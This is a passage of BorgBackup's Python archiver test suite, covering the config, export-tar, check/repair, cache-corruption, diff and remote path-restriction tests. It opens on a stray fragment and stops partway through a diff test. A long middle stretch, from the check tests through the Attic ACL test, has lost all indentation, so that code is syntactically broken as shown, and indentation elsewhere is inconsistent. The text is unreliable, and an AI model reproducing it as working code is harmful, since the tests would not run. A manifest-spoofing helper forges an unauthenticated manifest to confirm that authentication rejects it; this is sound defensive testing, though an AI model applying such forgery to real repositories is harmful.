        self.cmd('benchmark', 'crud', self.repository_location, self.input_path)
def test_config(self):
    """Exercise borg config: list, get, set, delete, and the usage-error cases."""
    self.create_test_files()
    os.unlink('input/flagfile')
    self.cmd('init', '--encryption=repokey', self.repository_location)
    # --list shows the repository section with all standard keys
    output = self.cmd('config', '--list', self.repository_location)
    self.assert_in('[repository]', output)
    self.assert_in('version', output)
    self.assert_in('segments_per_dir', output)
    self.assert_in('storage_quota', output)
    self.assert_in('append_only', output)
    self.assert_in('additional_free_space', output)
    self.assert_in('id', output)
    for cfg_key, cfg_value in [
        ('additional_free_space', '2G'),
        ('repository.append_only', '1'),
    ]:
        # both keys default to 0; set, read back, delete, then reading fails (rc 1)
        output = self.cmd('config', self.repository_location, cfg_key)
        assert output == '0' + '\n'
        self.cmd('config', self.repository_location, cfg_key, cfg_value)
        output = self.cmd('config', self.repository_location, cfg_key)
        assert output == cfg_value + '\n'
        self.cmd('config', '--delete', self.repository_location, cfg_key)
        self.cmd('config', self.repository_location, cfg_key, exit_code=1)
    # contradictory/missing arguments are usage errors (rc 2), unknown key is rc 1
    self.cmd('config', '--list', '--delete', self.repository_location, exit_code=2)
    self.cmd('config', self.repository_location, exit_code=2)
    self.cmd('config', self.repository_location, 'invalid-option', exit_code=1)
# class-level skip markers for tests that shell out to external tools
requires_gnutar = pytest.mark.skipif(not have_gnutar(), reason='GNU tar must be installed for this test.')
requires_gzip = pytest.mark.skipif(not shutil.which('gzip'), reason='gzip must be installed for this test.')
@requires_gnutar
def test_export_tar(self):
    """export-tar round-trips an archive through GNU tar without losing metadata."""
    self.create_test_files()
    os.unlink('input/flagfile')
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input')
    self.cmd('export-tar', self.repository_location + '::test', 'simple.tar', '--progress')
    with changedir('output'):
        # This probably assumes GNU tar. Note -p switch to extract permissions regardless of umask.
        subprocess.check_call(['tar', 'xpf', '../simple.tar', '--warning=no-timestamp'])
    self.assert_dirs_equal('input', 'output/input', ignore_bsdflags=True, ignore_xattrs=True, ignore_ns=True)
@requires_gnutar
@requires_gzip
def test_export_tar_gz(self):
    """export-tar to a .tar.gz picks gzip compression from the suffix; --list logs the paths."""
    # fix: dropped the in-body `shutil.which('gzip')` check - the @requires_gzip
    # marker already skips this test when gzip is missing, so it was dead code.
    self.create_test_files()
    os.unlink('input/flagfile')
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input')
    # fix: renamed `list` - it shadowed the builtin
    listed = self.cmd('export-tar', self.repository_location + '::test', 'simple.tar.gz', '--list')
    assert 'input/file1\n' in listed
    assert 'input/dir2\n' in listed
    with changedir('output'):
        subprocess.check_call(['tar', 'xpf', '../simple.tar.gz', '--warning=no-timestamp'])
    self.assert_dirs_equal('input', 'output/input', ignore_bsdflags=True, ignore_xattrs=True, ignore_ns=True)
@requires_gnutar
def test_export_tar_strip_components(self):
    """--strip-components is applied at extract time; --list shows the unstripped paths."""
    # fix: dropped the gzip availability check copied from test_export_tar_gz -
    # this test writes a plain, uncompressed tar and never uses gzip.
    self.create_test_files()
    os.unlink('input/flagfile')
    self.cmd('init', '--encryption=repokey', self.repository_location)
    self.cmd('create', self.repository_location + '::test', 'input')
    # fix: renamed `list` - it shadowed the builtin
    listed = self.cmd('export-tar', self.repository_location + '::test', 'simple.tar', '--strip-components=1', '--list')
    # --list's path are those before processing with --strip-components
    assert 'input/file1\n' in listed
    assert 'input/dir2\n' in listed
    with changedir('output'):
        subprocess.check_call(['tar', 'xpf', '../simple.tar', '--warning=no-timestamp'])
    self.assert_dirs_equal('input', 'output/', ignore_bsdflags=True, ignore_xattrs=True, ignore_ns=True)
@requires_hardlinks
@requires_gnutar
def test_export_tar_strip_components_links(self):
    """Hardlink pairs survive export-tar with --strip-components."""
    self._extract_hardlinks_setup()
    self.cmd('export-tar', self.repository_location + '::test', 'output.tar', '--strip-components=2')
    with changedir('output'):
        subprocess.check_call(['tar', 'xpf', '../output.tar', '--warning=no-timestamp'])
        # every member of a link pair must still have two links after extraction
        for name in ('hardlink', 'subdir/hardlink', 'aaaa', 'source2'):
            assert os.stat(name).st_nlink == 2
@requires_hardlinks
@requires_gnutar
def test_extract_hardlinks_tar(self):
    """Hardlink pairs survive export-tar of a subtree."""
    self._extract_hardlinks_setup()
    self.cmd('export-tar', self.repository_location + '::test', 'output.tar', 'input/dir1')
    with changedir('output'):
        subprocess.check_call(['tar', 'xpf', '../output.tar', '--warning=no-timestamp'])
        # every member of a link pair must still have two links after extraction
        for name in ('hardlink', 'subdir/hardlink', 'aaaa', 'source2'):
            assert os.stat(os.path.join('input', 'dir1', name)).st_nlink == 2
def test_detect_attic_repo(self):
    """Every repo-touching command must refuse an attic repo with a clear message."""
    path = make_attic_repo(self.repository_path)
    for args in (
        ['create', path + '::test', self.tmpdir],
        ['extract', path + '::test'],
        ['check', path],
        ['rename', path + '::test', 'newname'],
        ['list', path],
        ['delete', path],
        ['prune', path],
        ['info', path + '::test'],
        ['key', 'export', path, 'exported'],
        ['key', 'import', path, 'import'],
        ['key', 'change-passphrase', path],
        ['break-lock', path],
    ):
        assert 'Attic repository detected.' in self.cmd(*args, fork=True, exit_code=2)
@unittest.skipUnless('binary' in BORG_EXES, 'no borg.exe available')
class ArchiverTestCaseBinary(ArchiverTestCase):
    """Run the archiver test suite against the frozen borg.exe binary.

    Always forks (the binary cannot run in-process); tests that patch Python
    objects, or that are incompatible with fakeroot/the binary, are skipped.
    """
    EXE = 'borg.exe'
    FORK_DEFAULT = True

    @unittest.skip('does not raise Exception, but sets rc==2')
    def test_init_parent_dirs(self):
        pass

    @unittest.skip('patches objects')
    def test_init_interrupt(self):
        pass

    @unittest.skip('patches objects')
    def test_extract_capabilities(self):
        pass

    @unittest.skip('patches objects')
    def test_extract_xattrs_errors(self):
        pass

    @unittest.skip('test_basic_functionality seems incompatible with fakeroot and/or the binary.')
    def test_basic_functionality(self):
        pass

    @unittest.skip('test_overwrite seems incompatible with fakeroot and/or the binary.')
    def test_overwrite(self):
        pass

    def test_fuse(self):
        if fakeroot_detected():
            # fix: the original called unittest.skip(...) as a plain function,
            # which only RETURNS a decorator and silently skipped nothing -
            # the test just passed without running. skipTest() actually raises
            # SkipTest so the test is reported as skipped.
            self.skipTest('test_fuse with the binary is not compatible with fakeroot')
        super().test_fuse()
class ArchiverCheckTestCase(ArchiverTestCaseBase):
def setUp(self):
    """Prepare a repo with two source archives.

    ChunkBuffer.BUFFER_SIZE is patched down to 10 bytes so the archive item
    metadata stream spans many chunks, giving the consistency checks below
    something non-trivial to verify.
    """
    super().setUp()
    with patch.object(ChunkBuffer, 'BUFFER_SIZE', 10):
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_src_archive('archive1')
        self.create_src_archive('archive2')
def test_check_usage(self):
    """Exercise check's verbosity plus --repository-only/--archives-only and archive filters."""
    output = self.cmd('check', '-v', '--progress', self.repository_location, exit_code=0)
    self.assert_in('Starting repository check', output)
    self.assert_in('Starting archive consistency check', output)
    self.assert_in('Checking segments', output)
    # reset logging to new process default to avoid need for fork=True on next check
    logging.getLogger('borg.output.progress').setLevel(logging.NOTSET)
    # --repository-only: no archive phase
    output = self.cmd('check', '-v', '--repository-only', self.repository_location, exit_code=0)
    self.assert_in('Starting repository check', output)
    self.assert_not_in('Starting archive consistency check', output)
    self.assert_not_in('Checking segments', output)
    # --archives-only: no repository phase
    output = self.cmd('check', '-v', '--archives-only', self.repository_location, exit_code=0)
    self.assert_not_in('Starting repository check', output)
    self.assert_in('Starting archive consistency check', output)
    # --prefix / --first / --last restrict which archives get checked
    output = self.cmd('check', '-v', '--archives-only', '--prefix=archive2', self.repository_location, exit_code=0)
    self.assert_not_in('archive1', output)
    output = self.cmd('check', '-v', '--archives-only', '--first=1', self.repository_location, exit_code=0)
    self.assert_in('archive1', output)
    self.assert_not_in('archive2', output)
    output = self.cmd('check', '-v', '--archives-only', '--last=1', self.repository_location, exit_code=0)
    self.assert_not_in('archive1', output)
    self.assert_in('archive2', output)
def test_missing_file_chunk(self):
archive, repository = self.open_archive('archive1')
with repository:
for item in archive.iter_items():
if item.path.endswith('testsuite/archiver.py'):
valid_chunks = item.chunks
killed_chunk = valid_chunks[-1]
repository.delete(killed_chunk.id)
break
else:
self.fail('should not happen')
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
output = self.cmd('check', '--repair', self.repository_location, exit_code=0)
self.assert_in('New missing file chunk detected', output)
self.cmd('check', self.repository_location, exit_code=0)
output = self.cmd('list', '--format={health}#{path}{LF}', self.repository_location + '::archive1', exit_code=0)
self.assert_in('broken#', output)
# check that the file in the old archives has now a different chunk list without the killed chunk
for archive_name in ('archive1', 'archive2'):
archive, repository = self.open_archive(archive_name)
with repository:
for item in archive.iter_items():
if item.path.endswith('testsuite/archiver.py'):
self.assert_not_equal(valid_chunks, item.chunks)
self.assert_not_in(killed_chunk, item.chunks)
break
else:
self.fail('should not happen')
# do a fresh backup (that will include the killed chunk)
with patch.object(ChunkBuffer, 'BUFFER_SIZE', 10):
self.create_src_archive('archive3')
# check should be able to heal the file now:
output = self.cmd('check', '-v', '--repair', self.repository_location, exit_code=0)
self.assert_in('Healed previously missing file chunk', output)
self.assert_in('testsuite/archiver.py: Completely healed previously damaged file!', output)
# check that the file in the old archives has the correct chunks again
for archive_name in ('archive1', 'archive2'):
archive, repository = self.open_archive(archive_name)
with repository:
for item in archive.iter_items():
if item.path.endswith('testsuite/archiver.py'):
self.assert_equal(valid_chunks, item.chunks)
break
else:
self.fail('should not happen')
# list is also all-healthy again
output = self.cmd('list', '--format={health}#{path}{LF}', self.repository_location + '::archive1', exit_code=0)
self.assert_not_in('broken#', output)
def test_missing_archive_item_chunk(self):
archive, repository = self.open_archive('archive1')
with repository:
repository.delete(archive.metadata.items[0])
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
self.cmd('check', '--repair', self.repository_location, exit_code=0)
self.cmd('check', self.repository_location, exit_code=0)
def test_missing_archive_metadata(self):
archive, repository = self.open_archive('archive1')
with repository:
repository.delete(archive.id)
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
self.cmd('check', '--repair', self.repository_location, exit_code=0)
self.cmd('check', self.repository_location, exit_code=0)
def test_missing_manifest(self):
archive, repository = self.open_archive('archive1')
with repository:
repository.delete(Manifest.MANIFEST_ID)
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
output = self.cmd('check', '-v', '--repair', self.repository_location, exit_code=0)
self.assert_in('archive1', output)
self.assert_in('archive2', output)
self.cmd('check', self.repository_location, exit_code=0)
def test_corrupted_manifest(self):
archive, repository = self.open_archive('archive1')
with repository:
manifest = repository.get(Manifest.MANIFEST_ID)
corrupted_manifest = manifest + b'corrupted!'
repository.put(Manifest.MANIFEST_ID, corrupted_manifest)
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
output = self.cmd('check', '-v', '--repair', self.repository_location, exit_code=0)
self.assert_in('archive1', output)
self.assert_in('archive2', output)
self.cmd('check', self.repository_location, exit_code=0)
def test_manifest_rebuild_corrupted_chunk(self):
archive, repository = self.open_archive('archive1')
with repository:
manifest = repository.get(Manifest.MANIFEST_ID)
corrupted_manifest = manifest + b'corrupted!'
repository.put(Manifest.MANIFEST_ID, corrupted_manifest)
chunk = repository.get(archive.id)
corrupted_chunk = chunk + b'corrupted!'
repository.put(archive.id, corrupted_chunk)
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
output = self.cmd('check', '-v', '--repair', self.repository_location, exit_code=0)
self.assert_in('archive2', output)
self.cmd('check', self.repository_location, exit_code=0)
def test_manifest_rebuild_duplicate_archive(self):
archive, repository = self.open_archive('archive1')
key = archive.key
with repository:
manifest = repository.get(Manifest.MANIFEST_ID)
corrupted_manifest = manifest + b'corrupted!'
repository.put(Manifest.MANIFEST_ID, corrupted_manifest)
archive = msgpack.packb({
'cmdline': [],
'items': [],
'hostname': 'foo',
'username': 'bar',
'name': 'archive1',
'time': '2016-12-15T18:49:51.849711',
'version': 1,
})
archive_id = key.id_hash(archive)
repository.put(archive_id, key.encrypt(archive))
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
self.cmd('check', '--repair', self.repository_location, exit_code=0)
output = self.cmd('list', self.repository_location)
self.assert_in('archive1', output)
self.assert_in('archive1.1', output)
self.assert_in('archive2', output)
def test_extra_chunks(self):
self.cmd('check', self.repository_location, exit_code=0)
with Repository(self.repository_location, exclusive=True) as repository:
repository.put(b'01234567890123456789012345678901', b'xxxx')
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
self.cmd('check', self.repository_location, exit_code=1)
self.cmd('check', '--repair', self.repository_location, exit_code=0)
self.cmd('check', self.repository_location, exit_code=0)
self.cmd('extract', '--dry-run', self.repository_location + '::archive1', exit_code=0)
def _test_verify_data(self, *init_args):
shutil.rmtree(self.repository_path)
self.cmd('init', self.repository_location, *init_args)
self.create_src_archive('archive1')
archive, repository = self.open_archive('archive1')
with repository:
for item in archive.iter_items():
if item.path.endswith('testsuite/archiver.py'):
chunk = item.chunks[-1]
data = repository.get(chunk.id) + b'1234'
repository.put(chunk.id, data)
break
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=0)
output = self.cmd('check', '--verify-data', self.repository_location, exit_code=1)
assert bin_to_hex(chunk.id) + ', integrity error' in output
# repair (heal is tested in another test)
output = self.cmd('check', '--repair', '--verify-data', self.repository_location, exit_code=0)
assert bin_to_hex(chunk.id) + ', integrity error' in output
assert 'testsuite/archiver.py: New missing file chunk detected' in output
def test_verify_data(self):
self._test_verify_data('--encryption', 'repokey')
def test_verify_data_unencrypted(self):
self._test_verify_data('--encryption', 'none')
def test_empty_repository(self):
with Repository(self.repository_location, exclusive=True) as repository:
for id_ in repository.list():
repository.delete(id_)
repository.commit(compact=False)
self.cmd('check', self.repository_location, exit_code=1)
def test_attic013_acl_bug(self):
# Attic up to release 0.13 contained a bug where every item unintentionally received
# a b'acl'=None key-value pair.
# This bug can still live on in Borg repositories (through borg upgrade).
class Attic013Item:
def as_dict(self):
return {
# These are required
b'path': '1234',
b'mtime': 0,
b'mode': 0,
b'user': b'0',
b'group': b'0',
b'uid': 0,
b'gid': 0,
# acl is the offending key.
b'acl': None,
}
archive, repository = self.open_archive('archive1')
with repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
with Cache(repository, key, manifest) as cache:
archive = Archive(repository, key, manifest, '0.13', cache=cache, create=True)
archive.items_buffer.add(Attic013Item())
archive.save()
self.cmd('check', self.repository_location, exit_code=0)
self.cmd('list', self.repository_location + '::0.13', exit_code=0)
class ManifestAuthenticationTest(ArchiverTestCaseBase):
    """Tests for TAM (tertiary authentication mechanism) protection of the manifest."""

    def spoof_manifest(self, repository):
        """Overwrite the manifest with an attacker-style unauthenticated (no-TAM) one,
        timestamped in the future so it supersedes the current manifest."""
        with repository:
            _, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
            repository.put(Manifest.MANIFEST_ID, key.encrypt(msgpack.packb({
                'version': 1,
                'archives': {},
                'config': {},
                'timestamp': (datetime.utcnow() + timedelta(days=1)).strftime(ISO_FORMAT),
            })))
            repository.commit(compact=False)

    def test_fresh_init_tam_required(self):
        """A freshly initialized repo requires TAM: replacing the manifest with an
        unauthenticated one must raise TAMRequiredError."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        repository = Repository(self.repository_path, exclusive=True)
        with repository:
            manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
            repository.put(Manifest.MANIFEST_ID, key.encrypt(msgpack.packb({
                'version': 1,
                'archives': {},
                'timestamp': (datetime.utcnow() + timedelta(days=1)).strftime(ISO_FORMAT),
            })))
            repository.commit(compact=False)
        with pytest.raises(TAMRequiredError):
            self.cmd('list', self.repository_location)

    def test_not_required(self):
        """Pre-1.0.9-style repo (tam_required=False, no 'tam' in manifest) is accepted;
        after 'borg upgrade --tam' a spoofed manifest must be rejected."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_src_archive('archive1234')
        repository = Repository(self.repository_path, exclusive=True)
        with repository:
            # drop the security dir so the client forgets it ever saw a TAM manifest
            shutil.rmtree(get_security_dir(bin_to_hex(repository.id)))
            _, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
            key.tam_required = False
            key.change_passphrase(key._passphrase)
            # strip the TAM from the stored manifest
            manifest = msgpack.unpackb(key.decrypt(None, repository.get(Manifest.MANIFEST_ID)))
            del manifest[b'tam']
            repository.put(Manifest.MANIFEST_ID, key.encrypt(msgpack.packb(manifest)))
            repository.commit(compact=False)
        output = self.cmd('list', '--debug', self.repository_location)
        assert 'archive1234' in output
        assert 'TAM not found and not required' in output
        # Run upgrade
        self.cmd('upgrade', '--tam', self.repository_location)
        # Manifest must be authenticated now
        output = self.cmd('list', '--debug', self.repository_location)
        assert 'archive1234' in output
        assert 'TAM-verified manifest' in output
        # Try to spoof / modify pre-1.0.9
        self.spoof_manifest(repository)
        # Fails
        with pytest.raises(TAMRequiredError):
            self.cmd('list', self.repository_location)
        # Force upgrade
        self.cmd('upgrade', '--tam', '--force', self.repository_location)
        self.cmd('list', self.repository_location)

    def test_disable(self):
        """After 'upgrade --disable-tam', a spoofed (unauthenticated) manifest is accepted."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_src_archive('archive1234')
        self.cmd('upgrade', '--disable-tam', self.repository_location)
        repository = Repository(self.repository_path, exclusive=True)
        self.spoof_manifest(repository)
        assert not self.cmd('list', self.repository_location)

    def test_disable2(self):
        """Same as test_disable, but spoof *before* disabling TAM."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_src_archive('archive1234')
        repository = Repository(self.repository_path, exclusive=True)
        self.spoof_manifest(repository)
        self.cmd('upgrade', '--disable-tam', self.repository_location)
        assert not self.cmd('list', self.repository_location)
class RemoteArchiverTestCase(ArchiverTestCase):
    """Re-run the whole ArchiverTestCase suite against a RemoteRepository,
    plus remote-only tests for 'borg serve' path/repository restrictions."""
    # location prefix that turns self.repository_location into a remote-style URL
    prefix = '__testsuite__:'

    def open_repository(self):
        """Open the test repository through the remote (borg serve) code path."""
        return RemoteRepository(Location(self.repository_location))

    def test_remote_repo_restrict_to_path(self):
        """'borg serve --restrict-to-path' must only allow repos at/under the given paths."""
        # restricted to repo directory itself:
        with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', self.repository_path]):
            self.cmd('init', '--encryption=repokey', self.repository_location)
        # restricted to repo directory itself, fail for other directories with same prefix:
        with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', self.repository_path]):
            with pytest.raises(PathNotAllowed):
                self.cmd('init', '--encryption=repokey', self.repository_location + '_0')
        # restricted to a completely different path:
        with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', '/foo']):
            with pytest.raises(PathNotAllowed):
                self.cmd('init', '--encryption=repokey', self.repository_location + '_1')
        path_prefix = os.path.dirname(self.repository_path)
        # restrict to repo directory's parent directory:
        with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', path_prefix]):
            self.cmd('init', '--encryption=repokey', self.repository_location + '_2')
        # restrict to repo directory's parent directory and another directory:
        with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-path', '/foo', '--restrict-to-path', path_prefix]):
            self.cmd('init', '--encryption=repokey', self.repository_location + '_3')

    def test_remote_repo_restrict_to_repository(self):
        """'borg serve --restrict-to-repository' allows exactly that repository, not its parent."""
        # restricted to repo directory itself:
        with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-repository', self.repository_path]):
            self.cmd('init', '--encryption=repokey', self.repository_location)
        parent_path = os.path.join(self.repository_path, '..')
        with patch.object(RemoteRepository, 'extra_test_args', ['--restrict-to-repository', parent_path]):
            with pytest.raises(PathNotAllowed):
                self.cmd('init', '--encryption=repokey', self.repository_location)

    @unittest.skip('only works locally')
    def test_debug_put_get_delete_obj(self):
        pass

    @unittest.skip('only works locally')
    def test_config(self):
        pass

    def test_strip_components_doesnt_leak(self):
        """Extraction with --strip-components must not leave cached responses
        behind in the RemoteRepository (the --debug marker must not appear)."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_regular_file('dir/file', contents=b"test file contents 1")
        self.create_regular_file('dir/file2', contents=b"test file contents 2")
        self.create_regular_file('skipped-file1', contents=b"test file contents 3")
        self.create_regular_file('skipped-file2', contents=b"test file contents 4")
        self.create_regular_file('skipped-file3', contents=b"test file contents 5")
        self.cmd('create', self.repository_location + '::test', 'input')
        # this marker in --debug output would indicate leaked cached responses
        marker = 'cached responses left in RemoteRepository'
        with changedir('output'):
            # strip-components=3: everything stripped away, nothing extracted
            res = self.cmd('extract', "--debug", self.repository_location + '::test', '--strip-components', '3')
            self.assert_true(marker not in res)
            with self.assert_creates_file('file'):
                res = self.cmd('extract', "--debug", self.repository_location + '::test', '--strip-components', '2')
                self.assert_true(marker not in res)
            with self.assert_creates_file('dir/file'):
                res = self.cmd('extract', "--debug", self.repository_location + '::test', '--strip-components', '1')
                self.assert_true(marker not in res)
            with self.assert_creates_file('input/dir/file'):
                res = self.cmd('extract', "--debug", self.repository_location + '::test', '--strip-components', '0')
                self.assert_true(marker not in res)
class ArchiverCorruptionTestCase(ArchiverTestCaseBase):
    """Tests for detection/recovery of corruption in the local cache
    (chunks cache, files cache, chunks.archive.d, cache config)."""

    def setUp(self):
        super().setUp()
        self.create_test_files()
        self.cmd('init', '--encryption=repokey', self.repository_location)
        # cache directory of this repo, as reported by `borg info --json`
        self.cache_path = json.loads(self.cmd('info', self.repository_location, '--json'))['cache']['path']

    def corrupt(self, file):
        """Corrupt *file* in place by overwriting its last byte with b'1'."""
        with open(file, 'r+b') as fd:
            fd.seek(-1, io.SEEK_END)
            fd.write(b'1')

    def test_cache_chunks(self):
        """A corrupted chunks cache must fail the cache integrity check."""
        self.corrupt(os.path.join(self.cache_path, 'chunks'))
        if self.FORK_DEFAULT:
            # in fork mode we can only observe the exit code / message
            out = self.cmd('info', self.repository_location, exit_code=2)
            assert 'failed integrity check' in out
        else:
            with pytest.raises(FileIntegrityError):
                self.cmd('info', self.repository_location)

    def test_cache_files(self):
        """A corrupted files cache is reported, then borg continues without it."""
        self.cmd('create', self.repository_location + '::test', 'input')
        self.corrupt(os.path.join(self.cache_path, 'files'))
        out = self.cmd('create', self.repository_location + '::test1', 'input')
        # borg warns about the corrupt files cache, but then continues without files cache.
        assert 'files cache is corrupted' in out

    def test_chunks_archive(self):
        """A corrupted per-archive chunk index in chunks.archive.d is detected
        during cache sync and rebuilt automatically."""
        self.cmd('create', self.repository_location + '::test1', 'input')
        # Find ID of test1 so we can corrupt it later :)
        target_id = self.cmd('list', self.repository_location, '--format={id}{LF}').strip()
        self.cmd('create', self.repository_location + '::test2', 'input')
        # Force cache sync, creating archive chunks of test1 and test2 in chunks.archive.d
        self.cmd('delete', '--cache-only', self.repository_location)
        self.cmd('info', self.repository_location, '--json')
        chunks_archive = os.path.join(self.cache_path, 'chunks.archive.d')
        assert len(os.listdir(chunks_archive)) == 4  # two archives, one chunks cache and one .integrity file each
        self.corrupt(os.path.join(chunks_archive, target_id + '.compact'))
        # Trigger cache sync by changing the manifest ID in the cache config
        config_path = os.path.join(self.cache_path, 'config')
        config = ConfigParser(interpolation=None)
        config.read(config_path)
        config.set('cache', 'manifest', bin_to_hex(bytes(32)))
        with open(config_path, 'w') as fd:
            config.write(fd)
        # Cache sync notices corrupted archive chunks, but automatically recovers.
        out = self.cmd('create', '-v', self.repository_location + '::test3', 'input', exit_code=1)
        assert 'Reading cached archive chunk index for test1' in out
        assert 'Cached archive chunk index of test1 is corrupted' in out
        assert 'Fetching and building archive index for test1' in out

    def test_old_version_interfered(self):
        # Modify the main manifest ID without touching the manifest ID in the integrity section.
        # This happens if a version without integrity checking modifies the cache.
        config_path = os.path.join(self.cache_path, 'config')
        config = ConfigParser(interpolation=None)
        config.read(config_path)
        config.set('cache', 'manifest', bin_to_hex(bytes(32)))
        with open(config_path, 'w') as fd:
            config.write(fd)
        out = self.cmd('info', self.repository_location)
        assert 'Cache integrity data not available: old Borg version modified the cache.' in out
class DiffArchiverTestCase(ArchiverTestCaseBase):
    """Tests for ``borg diff`` between two archives."""

    def test_basic_functionality(self):
        """Take two snapshots with many kinds of changes between them (add/remove/replace
        of files, dirs, symlinks, hardlinks) and check that diff reports each change,
        both with chunk-id comparison (same chunker params) and without (different params)."""
        # Setup files for the first snapshot
        self.create_regular_file('empty', size=0)
        self.create_regular_file('file_unchanged', size=128)
        self.create_regular_file('file_removed', size=256)
        self.create_regular_file('file_removed2', size=512)
        self.create_regular_file('file_replaced', size=1024)
        os.mkdir('input/dir_replaced_with_file')
        os.chmod('input/dir_replaced_with_file', stat.S_IFDIR | 0o755)
        os.mkdir('input/dir_removed')
        if are_symlinks_supported():
            os.mkdir('input/dir_replaced_with_link')
            os.symlink('input/dir_replaced_with_file', 'input/link_changed')
            os.symlink('input/file_unchanged', 'input/link_removed')
            os.symlink('input/file_removed2', 'input/link_target_removed')
            os.symlink('input/empty', 'input/link_target_contents_changed')
            os.symlink('input/empty', 'input/link_replaced_by_file')
        if are_hardlinks_supported():
            os.link('input/file_replaced', 'input/hardlink_target_replaced')
            os.link('input/empty', 'input/hardlink_contents_changed')
            os.link('input/file_removed', 'input/hardlink_removed')
            os.link('input/file_removed2', 'input/hardlink_target_removed')
        self.cmd('init', '--encryption=repokey', self.repository_location)
        # Create the first snapshot
        self.cmd('create', self.repository_location + '::test0', 'input')
        # Setup files for the second snapshot
        self.create_regular_file('file_added', size=2048)
        self.create_regular_file('file_empty_added', size=0)
        os.unlink('input/file_replaced')
        self.create_regular_file('file_replaced', contents=b'0' * 4096)
        os.unlink('input/file_removed')
        os.unlink('input/file_removed2')
        os.rmdir('input/dir_replaced_with_file')
        self.create_regular_file('dir_replaced_with_file', size=8192)
        os.chmod('input/dir_replaced_with_file', stat.S_IFREG | 0o755)
        os.mkdir('input/dir_added')
        os.rmdir('input/dir_removed')
        if are_symlinks_supported():
            os.rmdir('input/dir_replaced_with_link')
            os.symlink('input/dir_added', 'input/dir_replaced_with_link')
            os.unlink('input/link_changed')
            os.symlink('input/dir_added', 'input/link_changed')
            os.symlink('input/dir_added', 'input/link_added')
            os.unlink('input/link_replaced_by_file')
            self.create_regular_file('link_replaced_by_file', size=16384)
            os.unlink('input/link_removed')
        if are_hardlinks_supported():
            os.unlink('input/hardlink_removed')
            os.link('input/file_added', 'input/hardlink_added')
        with open('input/empty', 'ab') as fd:
            fd.write(b'appended_data')
        # Create the second snapshot
        self.cmd('create', self.repository_location + '::test1a', 'input')
        self.cmd('create', '--chunker-params', '16,18,17,4095', self.repository_location + '::test1b', 'input')

        def do_asserts(output, can_compare_ids):
            # File contents changed (deleted and replaced with a new file)
            change = 'B' if can_compare_ids else '{:<19}'.format('modified')
            assert 'file_replaced' in output  # added to debug #3494
            assert '{} input/file_replaced'.format(change) in output
            # File unchanged
            assert 'input/file_unchanged' not in output
            # Directory replaced with a regular file
            if 'BORG_TESTS_IGNORE_MODES' not in os.environ:
                assert '[drwxr-xr-x -> -rwxr-xr-x] input/dir_replaced_with_file' in output
            # Basic directory cases
            assert 'added directory input/dir_added' in output
            assert 'removed directory input/dir_removed' in output
            if are_symlinks_supported():
                # Basic symlink cases
                assert 'changed link input/link_changed' in output
                assert 'added link input/link_added' in output
                assert 'removed link input/link_removed' in output
                # Symlink replacing or being replaced
                assert '] input/dir_replaced_with_link' in output
                assert '] input/link_replaced_by_file' in output
                # Symlink target removed. Should not affect the symlink at all.
                assert 'input/link_target_removed' not in output
            # The inode has two links and the file contents changed. Borg
            # should notice the changes in both links. However, the symlink
            # pointing to the file is not changed.
            change = '0 B' if can_compare_ids else '{:<19}'.format('modified')
            assert '{} input/empty'.format(change) in output
            if are_hardlinks_supported():
                assert '{} input/hardlink_contents_changed'.format(change) in output
            if are_symlinks_supported():
                assert 'input/link_target_contents_changed' not in output
            # Added a new file and a hard link to it. Both links to the same
            # inode should appear as separate files.
            assert 'added 2.05 kB input/file_added' in output
            if are_hardlinks_supported():
                assert 'added 2.05 kB input/hardlink_added' in output
            # check if a diff between non-existent and empty new file is found
            assert 'added 0 B input/file_empty_added' in output
            # The inode has two links and both of them are deleted. They should
            # appear as two deleted files.
            assert 'removed 256 B input/file_removed' in output
            if are_hardlinks_supported():
                assert 'removed 256 B input/hardlink_removed' in output
            # Another link (marked previously as the source in borg) to the
            # same inode was removed. This should not change this link at all.
            if are_hardlinks_supported():
                assert 'input/hardlink_target_removed' not in output
            # Another link (marked previously as the source in borg) to the
            # same inode was replaced with a new regular file. This should not
            # change this link at all.
            if are_hardlinks_supported():
                assert 'input/hardlink_target_replaced' not in output

        do_asserts(self.cmd('diff', self.repository_location + '::test0', 'test1a'), True)
        # We expect exit_code=1 due to the chunker params warning
        do_asserts(self.cmd('diff', self.repository_location + '::test0', 'test1b', exit_code=1), False)

    def test_sort_option(self):
        """``borg diff --sort`` must output changed paths in sorted order."""
        self.cmd('init', '--encryption=repokey', self.repository_location)
        self.create_regular_file('a_file_removed', size=8)
        self.create_regular_file('f_file_removed', size=16)
        self.create_regular_file('c_file_changed', size=32)
        self.create_regular_file('e_file_changed', size=64)
        self.cmd('create', self.repository_location + '::test0', 'input')
        os.unlink('input/a_file_removed')
        os.unlink('input/f_file_removed')
        os.unlink('input/c_file_changed')
        os.unlink('input/e_file_changed')
        self.create_regular_file('c_file_changed', size=512)
        self.create_regular_file('e_file_changed', size=1024)
        self.create_regular_file('b_file_added', size=128)
